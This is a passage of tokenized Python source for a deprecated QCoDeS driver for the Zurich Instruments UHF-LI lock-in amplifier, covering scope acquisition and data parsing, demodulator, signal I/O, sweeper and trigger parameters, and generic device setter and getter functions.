OK')<line_sep>rawdata=scope.read()<if_stmt>"error"<in>rawdata<block_start>zi_error=bool(rawdata["error"][0])<block_end>data=self._scopedataparser(rawdata self.instrument.device npts segs channels)<block_end><else_stmt><block_start>log.warning('[-] ZI scope acquisition attempt {} '<concat>'failed, Timeout: {}, Error: {}, '<concat>'retrying'.format(error_counter timedout zi_error))<line_sep>rawdata=<none><line_sep>data=(<none> <none>)<line_sep>error_counter<augadd>1<block_end><if_stmt>error_counter<ge>num_retries<block_start>log.error('[+] ZI scope acquisition failed, maximum number'<concat>'of retries performed. No data returned')<line_sep><raise>RuntimeError('[+] ZI scope acquisition failed, maximum number'<concat>'of retries performed. No data returned')<block_end><block_end><finally_stmt># cleanup and make ready for next scope acquisition <block_start>scope.finish()<block_end><block_end>t_stop=time.monotonic()<line_sep>log.info('scope get method returning after {} s'.format(t_stop-t_start))<line_sep><return>data<block_end>@staticmethod<def_stmt>_scopedataparser rawdata deviceID scopelength segments channels<block_start>""" Cast the scope return value dict into a tuple. Args: rawdata (dict): The return of scopeModule.read() deviceID (str): The device ID string of the instrument. scopelength (int): The length of each segment segments (int): The number of segments channels (tuple): Tuple of two bools controlling what data to return (True, False) will return data for channel 1 etc. Returns: tuple: A 2-tuple of either None or np.array with dimensions segments x scopelength. """<line_sep>data=rawdata[f'{deviceID}']['scopes']['0']['wave'][0][0]<if_stmt>channels[0]<block_start>ch1data=data['wave'][0].reshape(segments scopelength)<block_end><else_stmt><block_start>ch1data=<none><block_end><if_stmt>channels[1]<block_start>ch2data=data['wave'][1].reshape(segments scopelength)<block_end><else_stmt><block_start>ch2data=<none><block_end><return>(ch1data ch2data)<block_end><block_end><class_stmt>ZIUHFLI(Instrument)<block_start>""" QCoDeS driver for ZI UHF-LI. Currently implementing demodulator settings and the sweeper functionality. Requires ZI Lab One software to be installed on the computer running QCoDeS. Furthermore, the Data Server and Web Server must be running and a connection between the two must be made. TODOs: * Add zoom-FFT """<line_sep>@deprecate(reason="There is a new UHFLI driver from Zurich Instruments" alternative="instrument_drivers.zurich_instruments.uhfli.UHFLI")<def_stmt>__init__ self name:str device_ID:str **kwargs<arrow><none><block_start>""" Create an instance of the instrument. Args: name (str): The internal QCoDeS name of the instrument device_ID (str): The device name as listed in the web server. """<line_sep>super().__init__(name **kwargs)<line_sep>self.api_level=5<line_sep>zisession=zhinst.utils.create_api_session(device_ID self.api_level)<line_sep>(self.daq self.device self.props)=zisession<line_sep>self.daq.setDebugLevel(3)<line_sep># create (instantiate) an instance of each module we will use self.sweeper=self.daq.sweep()<line_sep>self.sweeper.set('sweep/device' self.device)<line_sep>self.scope=self.daq.scopeModule()<line_sep>self.scope.subscribe(f'/{self.device}/scopes/0/wave')<line_sep>######################################## # INSTRUMENT PARAMETERS ######################################## # Oscillators number_of_oscillators=8<if>'MF'<in>self.props['options']<else>2<for_stmt>oscs range(1 number_of_oscillators+1)<block_start>self.add_parameter(f'oscillator{oscs}_freq' label=f'Frequency of oscillator {oscs}' unit='Hz' set_cmd=partial(self._setter 'oscs' oscs-1 1 'freq') get_cmd=partial(self._getter 'oscs' oscs-1 1 'freq') vals=vals.Numbers(0 600e6))<line_sep>self.add_parameter(f'demod{oscs}_oscillator' label=f'Selected oscillator {oscs}' docstring="Connects the demodulator with the "<concat>"supplied oscillator." get_cmd=partial(self._getter 'demods' oscs-1 0 'oscselect') set_cmd=partial(self._setter 'demods' oscs-1 0 'oscselect') val_mapping={i+1:i<for>i range(number_of_oscillators)})<block_end>######################################## # DEMODULATOR PARAMETERS <for_stmt>demod range(1 9)<block_start>self.add_parameter(f'demod{demod}_order' label='Filter order' get_cmd=partial(self._getter 'demods' demod-1 0 'order') set_cmd=partial(self._setter 'demods' demod-1 0 'order') vals=vals.Ints(1 8))<line_sep>self.add_parameter(f'demod{demod}_harmonic' label=('Reference frequency multiplication'+' factor') get_cmd=partial(self._getter 'demods' demod-1 0 'harmonic') set_cmd=partial(self._setter 'demods' demod-1 0 'harmonic') vals=vals.Ints(1 999))<line_sep>self.add_parameter(f'demod{demod}_timeconstant' label='Filter time constant' get_cmd=partial(self._getter 'demods' demod-1 1 'timeconstant') set_cmd=partial(self._setter 'demods' demod-1 1 'timeconstant') unit='s')<line_sep>self.add_parameter(f'demod{demod}_samplerate' label='Sample rate' get_cmd=partial(self._getter 'demods' demod-1 1 'rate') set_cmd=partial(self._setter 'demods' demod-1 1 'rate') unit='Sa/s' docstring=""" Note: the value inserted by the user may be approximated to the nearest value supported by the instrument. """)<line_sep>self.add_parameter(f'demod{demod}_phaseshift' label='Phase shift' unit='degrees' get_cmd=partial(self._getter 'demods' demod-1 1 'phaseshift') set_cmd=partial(self._setter 'demods' demod-1 1 'phaseshift'))<line_sep># val_mapping for the demodX_signalin parameter dmsigins={'Sig In 1':0 'Sig In 2':1 'Trigger 1':2 'Trigger 2':3 'Aux Out 1':4 'Aux Out 2':5 'Aux Out 3':6 'Aux Out 4':7 'Aux In 1':8 'Aux In 2':9 'Phi Demod 4':10 'Phi Demod 8':11}<line_sep>self.add_parameter(f'demod{demod}_signalin' label='Signal input' get_cmd=partial(self._getter 'demods' demod-1 0 'adcselect') set_cmd=partial(self._setter 'demods' demod-1 0 'adcselect') val_mapping=dmsigins vals=vals.Enum(*list(dmsigins.keys())))<line_sep>self.add_parameter(f'demod{demod}_sinc' label='Sinc filter' get_cmd=partial(self._getter 'demods' demod-1 0 'sinc') set_cmd=partial(self._setter 'demods' demod-1 0 'sinc') val_mapping={'ON':1 'OFF':0} vals=vals.Enum('ON' 'OFF'))<line_sep>self.add_parameter(f'demod{demod}_streaming' label='Data streaming' get_cmd=partial(self._getter 'demods' demod-1 0 'enable') set_cmd=partial(self._setter 'demods' demod-1 0 'enable') val_mapping={'ON':1 'OFF':0} vals=vals.Enum('ON' 'OFF'))<line_sep>dmtrigs={'Continuous':0 'Trigger in 3 Rise':1 'Trigger in 3 Fall':2 'Trigger in 3 Both':3 'Trigger in 3 High':32 'Trigger in 3 Low':16 'Trigger in 4 Rise':4 'Trigger in 4 Fall':8 'Trigger in 4 Both':12 'Trigger in 4 High':128 'Trigger in 4 Low':64 'Trigger in 3|4 Rise':5 'Trigger in 3|4 Fall':10 'Trigger in 3|4 Both':15 'Trigger in 3|4 High':160 'Trigger in 3|4 Low':80}<line_sep>self.add_parameter(f'demod{demod}_trigger' label='Trigger' get_cmd=partial(self._getter 'demods' demod-1 0 'trigger') set_cmd=partial(self._setter 'demods' demod-1 0 'trigger') val_mapping=dmtrigs vals=vals.Enum(*list(dmtrigs.keys())))<line_sep>self.add_parameter(f'demod{demod}_sample' label='Demod sample' get_cmd=partial(self._getter 'demods' demod-1 2 'sample') snapshot_value=<false>)<for_stmt>demod_param ['x' 'y' 'R' 'phi']<block_start><if_stmt>demod_param<in>('x' 'y' 'R')<block_start>unit='V'<block_end><else_stmt><block_start>unit='deg'<block_end>self.add_parameter(f'demod{demod}_{demod_param}' label=f'Demod {demod} {demod_param}' get_cmd=partial(self._get_demod_sample demod-1 demod_param) snapshot_value=<false> unit=unit)<block_end><block_end>######################################## # SIGNAL INPUTS <for_stmt>sigin range(1 3)<block_start>self.add_parameter(f'signal_input{sigin}_range' label='Input range' set_cmd=partial(self._setter 'sigins' sigin-1 1 'range') get_cmd=partial(self._getter 'sigins' sigin-1 1 'range') unit='V')<line_sep>self.add_parameter(f'signal_input{sigin}_scaling' label='Input scaling' set_cmd=partial(self._setter 'sigins' sigin-1 1 'scaling') get_cmd=partial(self._getter 'sigins' sigin-1 1 'scaling') )<line_sep>self.add_parameter(f'signal_input{sigin}_AC' label='AC coupling' set_cmd=partial(self._setter 'sigins' sigin-1 0 'ac') get_cmd=partial(self._getter 'sigins' sigin-1 0 'ac') val_mapping={'ON':1 'OFF':0} vals=vals.Enum('ON' 'OFF'))<line_sep>self.add_parameter(f'signal_input{sigin}_impedance' label='Input impedance' set_cmd=partial(self._setter 'sigins' sigin-1 0 'imp50') get_cmd=partial(self._getter 'sigins' sigin-1 0 'imp50') val_mapping={50:1 1000:0} vals=vals.Enum(50 1000))<line_sep>sigindiffs={'Off':0 'Inverted':1 'Input 1 - Input 2':2 'Input 2 - Input 1':3}<line_sep>self.add_parameter(f'signal_input{sigin}_diff' label='Input signal subtraction' set_cmd=partial(self._setter 'sigins' sigin-1 0 'diff') get_cmd=partial(self._getter 'sigins' sigin-1 0 'diff') val_mapping=sigindiffs vals=vals.Enum(*list(sigindiffs.keys())))<block_end>######################################## # SIGNAL OUTPUTS outputamps={1:'amplitudes/3' 2:'amplitudes/7'}<line_sep>outputampenable={1:'enables/3' 2:'enables/7'}<for_stmt>sigout range(1 3)<block_start>self.add_parameter(f'signal_output{sigout}_on' label='Turn signal output on and off.' set_cmd=partial(self._sigout_setter sigout-1 0 'on') get_cmd=partial(self._sigout_getter sigout-1 0 'on') val_mapping={'ON':1 'OFF':0} vals=vals.Enum('ON' 'OFF'))<line_sep>self.add_parameter(f'signal_output{sigout}_imp50' label='Switch to turn on 50 Ohm impedance' set_cmd=partial(self._sigout_setter sigout-1 0 'imp50') get_cmd=partial(self._sigout_getter sigout-1 0 'imp50') val_mapping={'ON':1 'OFF':0} vals=vals.Enum('ON' 'OFF'))<line_sep>self.add_parameter(f'signal_output{sigout}_ampdef' get_cmd=<none> set_cmd=<none> initial_value='Vpk' label="Signal output amplitude's definition" unit='' vals=vals.Enum('Vpk' 'Vrms' 'dBm'))<line_sep>self.add_parameter(f'signal_output{sigout}_range' label='Signal output range' set_cmd=partial(self._sigout_setter sigout-1 1 'range') get_cmd=partial(self._sigout_getter sigout-1 1 'range') vals=vals.Enum(0.075 0.15 0.75 1.5))<line_sep>self.add_parameter(f'signal_output{sigout}_offset' label='Signal output offset' set_cmd=partial(self._sigout_setter sigout-1 1 'offset') get_cmd=partial(self._sigout_getter sigout-1 1 'offset') vals=vals.Numbers(-1.5 1.5) unit='V')<line_sep>self.add_parameter(f'signal_output{sigout}_autorange' label='Enable signal output range.' set_cmd=partial(self._sigout_setter sigout-1 0 'autorange') get_cmd=partial(self._sigout_getter sigout-1 0 'autorange') val_mapping={'ON':1 'OFF':0} vals=vals.Enum('ON' 'OFF'))<if_stmt>'MF'<in>self.props['options']<block_start><for_stmt>modeout range(1 9)<block_start>self.add_parameter(f'signal_output{sigout}_amplitude{modeout}' label='Signal output amplitude' set_cmd=partial(self._sigout_setter sigout-1 1 'amplitudes' output_mode=modeout-1) get_cmd=partial(self._sigout_getter sigout-1 1 'amplitudes' output_mode=modeout-1) docstring="Set the signal output amplitude. The actual "<concat>"unit and representation is defined by "<concat>"signal_output{}_ampdef "<concat>"parameter".format(sigout))<line_sep>self.add_parameter(f'signal_output{sigout}_enable{modeout}' label="Output signal enabled/disabled." set_cmd=partial(self._sigout_setter sigout-1 0 'enables' output_mode=modeout-1) get_cmd=partial(self._sigout_getter sigout-1 0 'enables' output_mode=modeout-1) val_mapping=create_on_off_val_mapping() docstring="Enabling/Disabling the Signal Output. "<concat>"Corresponds to the blue LED indicator on "<concat>"the instrument front panel.")<block_end><block_end><else_stmt><block_start>self.add_parameter(f'signal_output{sigout}_enable' label="Output signal enabled/disabled." set_cmd=partial(self._sigout_setter sigout-1 0 outputampenable[sigout]) get_cmd=partial(self._sigout_getter sigout-1 0 outputampenable[sigout]) val_mapping=create_on_off_val_mapping() docstring="Enabling/Disabling the Signal Output. "<concat>"Corresponds to the blue LED indicator on "<concat>"the instrument front panel.")<line_sep>self.add_parameter(f'signal_output{sigout}_amplitude' label='Signal output amplitude' set_cmd=partial(self._sigout_setter sigout-1 1 outputamps[sigout]) get_cmd=partial(self._sigout_getter sigout-1 1 outputamps[sigout]) docstring="Set the signal output amplitude. The actual unit"<concat>" and representation is defined by "<concat>"signal_output{}_ampdef parameter".format(sigout))<block_end><block_end>auxoutputchannels=ChannelList(self "AUXOutputChannels" AUXOutputChannel snapshotable=<false>)<for_stmt>auxchannum range(1 5)<block_start>name=f'aux_out{auxchannum}'<line_sep>auxchannel=AUXOutputChannel(self name auxchannum)<line_sep>auxoutputchannels.append(auxchannel)<line_sep>self.add_submodule(name auxchannel)<block_end>auxoutputchannels.lock()<line_sep>self.add_submodule('aux_out_channels' auxoutputchannels)<line_sep>######################################## # SWEEPER PARAMETERS self.add_parameter('sweeper_BWmode' label='Sweeper bandwidth control mode' set_cmd=partial(self._sweep_setter 'sweep/bandwidthcontrol') get_cmd=partial(self._sweep_getter 'sweep/bandwidthcontrol') val_mapping={'auto':2 'fixed':1 'current':0} docstring=""" For each sweep point, the demodulator filter bandwidth (time constant) may be either set automatically, be the current demodulator bandwidth or be a fixed number; the sweeper_BW parameter. """)<line_sep>self.add_parameter('sweeper_BW' label='Fixed bandwidth sweeper bandwidth (NEP)' set_cmd=partial(self._sweep_setter 'sweep/bandwidth') get_cmd=partial(self._sweep_getter 'sweep/bandwidth') docstring=""" This is the NEP bandwidth used by the sweeper if sweeper_BWmode is set to 'fixed'. If sweeper_BWmode is either 'auto' or 'current', this value is ignored. """)<line_sep>self.add_parameter('sweeper_start' label='Start value of the sweep' set_cmd=partial(self._sweep_setter 'sweep/start') get_cmd=partial(self._sweep_getter 'sweep/start') vals=vals.Numbers(0 600e6))<line_sep>self.add_parameter('sweeper_stop' label='Stop value of the sweep' set_cmd=partial(self._sweep_setter 'sweep/stop') get_cmd=partial(self._sweep_getter 'sweep/stop') vals=vals.Numbers(0 600e6))<line_sep>self.add_parameter('sweeper_samplecount' label='Length of the sweep (pts)' set_cmd=partial(self._sweep_setter 'sweep/samplecount') get_cmd=partial(self._sweep_getter 'sweep/samplecount') vals=vals.Ints(0 100000))<line_sep># val_mapping for sweeper_param parameter sweepparams={'Aux Out 1 Offset':'auxouts/0/offset' 'Aux Out 2 Offset':'auxouts/1/offset' 'Aux Out 3 Offset':'auxouts/2/offset' 'Aux Out 4 Offset':'auxouts/3/offset' 'Demod 1 Phase Shift':'demods/0/phaseshift' 'Demod 2 Phase Shift':'demods/1/phaseshift' 'Demod 3 Phase Shift':'demods/2/phaseshift' 'Demod 4 Phase Shift':'demods/3/phaseshift' 'Demod 5 Phase Shift':'demods/4/phaseshift' 'Demod 6 Phase Shift':'demods/5/phaseshift' 'Demod 7 Phase Shift':'demods/6/phaseshift' 'Demod 8 Phase Shift':'demods/7/phaseshift' 'Osc 1 Frequency':'oscs/0/freq' 'Osc 2 Frequency':'oscs/1/freq' 'Output 1 Amplitude 4':'sigouts/0/amplitudes/3' 'Output 1 Offset':'sigouts/0/offset' 'Output 2 Amplitude 8':'sigouts/1/amplitudes/7' 'Output 2 Offset':'sigouts/1/offset'}<line_sep>self.add_parameter('sweeper_param' label='Parameter to sweep (sweep x-axis)' set_cmd=partial(self._sweep_setter 'sweep/gridnode') val_mapping=sweepparams get_cmd=partial(self._sweep_getter 'sweep/gridnode') vals=vals.Enum(*list(sweepparams.keys())))<line_sep># val_mapping for sweeper_units parameter sweepunits={'Aux Out 1 Offset':'V' 'Aux Out 2 Offset':'V' 'Aux Out 3 Offset':'V' 'Aux Out 4 Offset':'V' 'Demod 1 Phase Shift':'degrees' 'Demod 2 Phase Shift':'degrees' 'Demod 3 Phase Shift':'degrees' 'Demod 4 Phase Shift':'degrees' 'Demod 5 Phase Shift':'degrees' 'Demod 6 Phase Shift':'degrees' 'Demod 7 Phase Shift':'degrees' 'Demod 8 Phase Shift':'degrees' 'Osc 1 Frequency':'Hz' 'Osc 2 Frequency':'Hz' 'Output 1 Amplitude 4':'V' 'Output 1 Offset':'V' 'Output 2 Amplitude 8':'V' 'Output 2 Offset':'V'}<line_sep>self.add_parameter('sweeper_units' label='Units of sweep x-axis' get_cmd=self.sweeper_param.get get_parser=<lambda>x:sweepunits[x])<line_sep># val_mapping for sweeper_mode parameter sweepmodes={'Sequential':0 'Binary':1 'Biderectional':2 'Reverse':3}<line_sep>self.add_parameter('sweeper_mode' label='Sweep mode' set_cmd=partial(self._sweep_setter 'sweep/scan') get_cmd=partial(self._sweep_getter 'sweep/scan') val_mapping=sweepmodes vals=vals.Enum(*list(sweepmodes)))<line_sep>self.add_parameter('sweeper_order' label='Sweeper filter order' set_cmd=partial(self._sweep_setter 'sweep/order') get_cmd=partial(self._sweep_getter 'sweep/order') vals=vals.Ints(1 8) docstring=""" This value is invoked only when the sweeper_BWmode is set to 'fixed'. """)<line_sep>self.add_parameter('sweeper_settlingtime' label=('Minimal settling time for the '+'sweeper') set_cmd=partial(self._sweep_setter 'sweep/settling/time') get_cmd=partial(self._sweep_getter 'sweep/settling/time') vals=vals.Numbers(0) unit='s' docstring=""" This is the minimal waiting time at each point during a sweep before the data acquisition starts. Note that the filter settings may result in a longer actual waiting/settling time. """)<line_sep>self.add_parameter('sweeper_inaccuracy' label='Demodulator filter settling inaccuracy' set_cmd=partial(self._sweep_setter 'sweep/settling/inaccuracy') docstring=""" Demodulator filter settling inaccuracy defining the wait time between a sweep parameter change and recording of the next sweep point. The settling time is calculated as the time required to attain the specified remaining proportion [1e-13, 0.1] of an incoming step function. Typical inaccuracy values: 10m for highest sweep speed for large signals, 100u for precise amplitude measurements, 100n for precise noise measurements. Depending on the order of the demodulator filter the settling inaccuracy will define the number of filter time constants the sweeper has to wait. The maximum between this value and the settling time is taken as wait time until the next sweep point is recorded. """)<line_sep>self.add_parameter('sweeper_settlingtc' label='Sweep filter settling time' get_cmd=partial(self._sweep_getter 'sweep/settling/tc') unit='' docstring="""This settling time is in units of the filter time constant.""")<line_sep>self.add_parameter('sweeper_averaging_samples' label=('Minimal no. of samples to average at '+'each sweep point') set_cmd=partial(self._sweep_setter 'sweep/averaging/sample') get_cmd=partial(self._sweep_getter 'sweep/averaging/sample') vals=vals.Ints(1) docstring=""" The actual number of samples is the maximum of this value and the sweeper_averaging_time times the relevant sample rate. """)<line_sep>self.add_parameter('sweeper_averaging_time' label=('Minimal averaging time') set_cmd=partial(self._sweep_setter 'sweep/averaging/tc') get_cmd=partial(self._sweep_getter 'sweep/averaging/tc') unit='s' docstring=""" The actual number of samples is the maximum of this value times the relevant sample rate and the sweeper_averaging_samples.""")<line_sep>self.add_parameter('sweeper_xmapping' label='Sweeper x mapping' set_cmd=partial(self._sweep_setter 'sweep/xmapping') get_cmd=partial(self._sweep_getter 'sweep/xmapping') val_mapping={'lin':0 'log':1})<line_sep>self.add_parameter('sweeper_sweeptime' label='Expected sweep time' unit='s' get_cmd=self._get_sweep_time)<line_sep>self.add_parameter('sweeper_timeout' label='Sweep timeout' unit='s' initial_value=600 get_cmd=<none> set_cmd=<none>)<line_sep>######################################## # THE SWEEP ITSELF self.add_parameter('Sweep' parameter_class=Sweep )<line_sep># A "manual" parameter: a list of the signals for the sweeper # to subscribe to self._sweeper_signals=[]# type: List[str] # This is the dictionary keeping track of the sweeper settings # These are the default settings self._sweepdict={'start':1e6 'stop':10e6 'samplecount':25 'bandwidthcontrol':1 # fixed mode 'bandwidth':50 'gridnode':'oscs/0/freq' 'scan':0 # sequential scan 'order':1 'settling/time':1e-6 'settling/inaccuracy':10e-3 'averaging/sample':25 'averaging/tc':100e-3 'xmapping':0 # linear }<line_sep># Set up the sweeper with the above settings self.Sweep.build_sweep()<line_sep>######################################## # SCOPE PARAMETERS # default parameters: # This parameter corresponds to the Run/Stop button in the GUI self.add_parameter('scope_runstop' label='Scope run state' set_cmd=partial(self._setter 'scopes' 0 0 'enable') get_cmd=partial(self._getter 'scopes' 0 0 'enable') val_mapping={'run':1 'stop':0} vals=vals.Enum('run' 'stop') docstring=('This parameter corresponds to the '<concat>'run/stop button in the GUI.'))<line_sep>self.add_parameter('scope_mode' label="Scope's mode: time or frequency domain." set_cmd=partial(self._scope_setter 1 0 'mode') get_cmd=partial(self._scope_getter 'mode') val_mapping={'Time Domain':1 'Freq Domain FFT':3} vals=vals.Enum('Time Domain' 'Freq Domain FFT'))<line_sep># 1: Channel 1 on, Channel 2 off. # 2: Channel 1 off, Channel 2 on, # 3: Channel 1 on, Channel 2 on. self.add_parameter('scope_channels' label='Recorded scope channels' set_cmd=partial(self._scope_setter 0 0 'channel') get_cmd=partial(self._getter 'scopes' 0 0 'channel') vals=vals.Enum(1 2 3))<line_sep>self._samplingrate_codes={'1.80 GHz':0 '900 MHz':1 '450 MHz':2 '225 MHz':3 '113 MHz':4 '56.2 MHz':5 '28.1 MHz':6 '14.0 MHz':7 '7.03 MHz':8 '3.50 MHz':9 '1.75 MHz':10 '880 kHz':11 '440 kHz':12 '220 kHz':13 '110 kHz':14 '54.9 kHz':15 '27.5 kHz':16}<line_sep>self.add_parameter('scope_samplingrate' label="Scope's sampling rate" set_cmd=partial(self._scope_setter 0 0 'time') get_cmd=partial(self._getter 'scopes' 0 0 'time') val_mapping=self._samplingrate_codes vals=vals.Enum(*list(self._samplingrate_codes.keys())))<line_sep>self.add_parameter("scope_samplingrate_float" label="Scope's sampling rate as float" set_cmd=self._set_samplingrate_as_float unit="Hz" get_cmd=self._get_samplingrate_as_float vals=vals.Enum(*(1.8e9/2<power>v<for>v self._samplingrate_codes.values())) docstring=""" A numeric representation of the scope's samplingrate parameter. Sets and gets the sampling rate by using the scope_samplingrate parameter.""")<line_sep>self.add_parameter('scope_length' label="Length of scope trace (pts)" set_cmd=partial(self._scope_setter 0 1 'length') get_cmd=partial(self._getter 'scopes' 0 1 'length') vals=vals.Numbers(4096 128000000) get_parser=int)<line_sep>self.add_parameter('scope_duration' label="Scope trace duration" set_cmd=partial(self._scope_setter 0 0 'duration') get_cmd=partial(self._scope_getter 'duration') vals=vals.Numbers(2.27e-6 4.660e3) unit='s')<line_sep># Map the possible input sources to LabOne's IDs. # The IDs can be seen in log file of LabOne UI inputselect={'Signal Input 1':0 'Signal Input 2':1 'Trig Input 1':2 'Trig Input 2':3 'Aux Output 1':4 'Aux Output 2':5 'Aux Output 3':6 'Aux Output 4':7 'Aux In 1 Ch 1':8 'Aux In 1 Ch 2':9 'Osc phi Demod 4':10 'Osc phi Demod 8':11 'AU Cartesian 1':112 'AU Cartesian 2':113 'AU Polar 1':128 'AU Polar 2':129 }<line_sep># Add all 8 demodulators and their respective parameters # to inputselect as well. # Numbers correspond to LabOne IDs, taken from UI log. <for_stmt>demod range(1 9)<block_start>inputselect[f'Demod {demod} X']=15+demod<line_sep>inputselect[f'Demod {demod} Y']=31+demod<line_sep>inputselect[f'Demod {demod} R']=47+demod<line_sep>inputselect[f'Demod {demod} Phase']=63+demod<block_end><for_stmt>channel range(1 3)<block_start>self.add_parameter(f"scope_channel{channel}_input" label=(f"Scope's channel {channel}"+" input source") set_cmd=partial(self._scope_setter 0 0 (f"channels/{channel-1}/"+"inputselect")) get_cmd=partial(self._getter "scopes" 0 0 (f"channels/{channel-1}/"+"inputselect") ) val_mapping=inputselect vals=vals.Enum(*list(inputselect.keys())) )<block_end>self.add_parameter('scope_average_weight' label="Scope Averages" set_cmd=partial(self._scope_setter 1 0 'averager/weight') get_cmd=partial(self._scope_getter 'averager/weight') vals=vals.Numbers(min_value=1))<line_sep>self.add_parameter('scope_trig_enable' label="Enable triggering for scope readout" set_cmd=partial(self._setter 'scopes' 0 0 'trigenable') get_cmd=partial(self._getter 'scopes' 0 0 'trigenable') val_mapping={'ON':1 'OFF':0} vals=vals.Enum('ON' 'OFF'))<line_sep>self.add_parameter('scope_trig_signal' label="Trigger signal source" set_cmd=partial(self._setter 'scopes' 0 0 'trigchannel') get_cmd=partial(self._getter 'scopes' 0 0 'trigchannel') val_mapping=inputselect vals=vals.Enum(*list(inputselect.keys())))<line_sep>slopes={'None':0 'Rise':1 'Fall':2 'Both':3}<line_sep>self.add_parameter('scope_trig_slope' label="Scope's triggering slope" set_cmd=partial(self._setter 'scopes' 0 0 'trigslope') get_cmd=partial(self._getter 'scopes' 0 0 'trigslope') val_mapping=slopes vals=vals.Enum(*list(slopes.keys())))<line_sep># TODO: figure out how value/percent works for the trigger level self.add_parameter('scope_trig_level' label="Scope trigger level" set_cmd=partial(self._setter 'scopes' 0 1 'triglevel') get_cmd=partial(self._getter 'scopes' 0 1 'triglevel') vals=vals.Numbers())<line_sep>self.add_parameter('scope_trig_hystmode' label="Enable triggering for scope readout." set_cmd=partial(self._setter 'scopes' 0 0 'trighysteresis/mode') get_cmd=partial(self._getter 'scopes' 0 0 'trighysteresis/mode') val_mapping={'absolute':0 'relative':1} vals=vals.Enum('absolute' 'relative'))<line_sep>self.add_parameter('scope_trig_hystrelative' label="Trigger hysteresis, relative value in %" set_cmd=partial(self._setter 'scopes' 0 1 'trighysteresis/relative') get_cmd=partial(self._getter 'scopes' 0 1 'trighysteresis/relative') # val_mapping= lambda x: 0.01*x, vals=vals.Numbers(0))<line_sep>self.add_parameter('scope_trig_hystabsolute' label="Trigger hysteresis, absolute value" set_cmd=partial(self._setter 'scopes' 0 1 'trighysteresis/absolute') get_cmd=partial(self._getter 'scopes' 0 1 'trighysteresis/absolute') vals=vals.Numbers(0 20))<line_sep>triggates={'Trigger In 3 High':0 'Trigger In 3 Low':1 'Trigger In 4 High':2 'Trigger In 4 Low':3}<line_sep>self.add_parameter('scope_trig_gating_source' label='Scope trigger gating source' set_cmd=partial(self._setter 'scopes' 0 0 'triggate/inputselect') get_cmd=partial(self._getter 'scopes' 0 0 'triggate/inputselect') val_mapping=triggates vals=vals.Enum(*list(triggates.keys())))<line_sep>self.add_parameter('scope_trig_gating_enable' label='Scope trigger gating ON/OFF' set_cmd=partial(self._setter 'scopes' 0 0 'triggate/enable') get_cmd=partial(self._getter 'scopes' 0 0 'triggate/enable') val_mapping={'ON':1 'OFF':0} vals=vals.Enum('ON' 'OFF'))<line_sep>self.add_parameter('scope_trig_holdoffmode' label="Scope trigger holdoff mode" set_cmd=partial(self._setter 'scopes' 0 0 'trigholdoffmode') get_cmd=partial(self._getter 'scopes' 0 0 'trigholdoffmode') val_mapping={'s':0 'events':1} vals=vals.Enum('s' 'events'))<line_sep>self.add_parameter('scope_trig_holdoffseconds' label='Scope trigger holdoff' set_cmd=partial(self._scope_setter 0 1 'trigholdoff') get_cmd=partial(self._getter 'scopes' 0 1 'trigholdoff') unit='s' vals=vals.Numbers(20e-6 10))<line_sep>self.add_parameter('scope_trig_reference' label='Scope trigger reference' set_cmd=partial(self._scope_setter 0 1 'trigreference') get_cmd=partial(self._getter 'scopes' 0 1 'trigreference') vals=vals.Numbers(0 100))<line_sep># TODO: add validation. What's the minimal/maximal delay? self.add_parameter('scope_trig_delay' label='Scope trigger delay' set_cmd=partial(self._scope_setter 0 1 'trigdelay') get_cmd=partial(self._getter 'scopes' 0 1 'trigdelay') unit='s')<line_sep>self.add_parameter('scope_segments' label='Enable/disable segments' set_cmd=partial(self._scope_setter 0 0 'segments/enable') get_cmd=partial(self._getter 'scopes' 0 0 'segments/enable') val_mapping={'OFF':0 'ON':1} vals=vals.Enum('ON' 'OFF'))<line_sep>self.add_parameter('scope_segments_count' label='No. of segments returned by scope' set_cmd=partial(self._setter 'scopes' 0 1 'segments/count') get_cmd=partial(self._getter 'scopes' 0 1 'segments/count') vals=vals.Ints(1 32768) get_parser=int)<line_sep>self.add_function('scope_reset_avg' call_cmd=partial(self.scope.set 'scopeModule/averager/restart' 1) )<line_sep>######################################## # THE SCOPE ITSELF self.add_parameter('Scope' parameter_class=Scope )<line_sep>######################################## # SYSTEM PARAMETERS self.add_parameter('external_clock_enabled' set_cmd=partial(self.daq.setInt f"/{self.device}/system/extclk") get_cmd=partial(self.daq.getInt f"/{self.device}/system/extclk") val_mapping=create_on_off_val_mapping() docstring="Set the clock source to external 10 MHz reference clock.")<line_sep>self.add_parameter('jumbo_frames_enabled' set_cmd=partial(self.daq.setInt f"/{self.device}/system/jumbo") get_cmd=partial(self.daq.getInt f"/{self.device}/system/jumbo") val_mapping=create_on_off_val_mapping() docstring="Enable jumbo frames on the TCP/IP interface")<block_end><def_stmt>snapshot_base self update:Optional[bool]=<true> params_to_skip_update:Optional[Sequence[str]]=<none><arrow>Dict[Any Any]<block_start>""" Override the base method to ignore 'sweeper_sweeptime' if no signals selected."""<line_sep>params_to_skip=[]<if_stmt><not>self._sweeper_signals<block_start>params_to_skip.append('sweeper_sweeptime')<block_end><if_stmt>params_to_skip_update<is><not><none><block_start>params_to_skip<augadd>list(params_to_skip_update)<block_end><return>super().snapshot_base(update=update params_to_skip_update=params_to_skip)<block_end><def_stmt>_setter self module number mode setting value<block_start>""" General function to set/send settings to the device. The module (e.g demodulator, input, output,..) number is counted in a zero indexed fashion. Args: module (str): The module (eg. demodulator, input, output, ..) to set. number (int): Module's index mode (int): Indicating whether we are asking for an int (0) or double (1) setting (str): The module's setting to set. value (int/double): The value to set. """<line_sep>setstr=f'/{self.device}/{module}/{number}/{setting}'<if_stmt>mode<eq>0<block_start>self.daq.setInt(setstr value)<block_end><if_stmt>mode<eq>1<block_start>self.daq.setDouble(setstr value)<block_end><block_end><def_stmt>_getter self module:str number:int mode:int setting:str<arrow>Union[float int str Dict[Any Any]]<block_start>""" General get function for generic parameters. Note that some parameters use more specialised setter/getters. The module (e.g demodulator, input, output,..) number is counted in a zero indexed fashion. Args: module (str): The module (eg. demodulator, input, output, ..) we want to know the value of. number (int): Module's index mode (int): Indicating whether we are asking for an int or double. 0: Int, 1: double, 2: Sample setting (str): The module's setting to set. returns: inquered value """<line_sep>querystr=f'/{self.device}/{module}/{number}/{setting}'<line_sep>log.debug("getting %s" querystr)<if_stmt>mode<eq>0<block_start>value=self.daq.getInt(querystr)<block_end><elif_stmt>mode<eq>1<block_start>value=self.daq.getDouble(querystr)<block_end><elif_stmt>mode<eq>2<block_start>value=self.daq.getSample(querystr)<block_end><else_stmt><block_start><raise>RuntimeError("Invalid mode supplied")<block_end># Weird exception, samplingrate returns a string 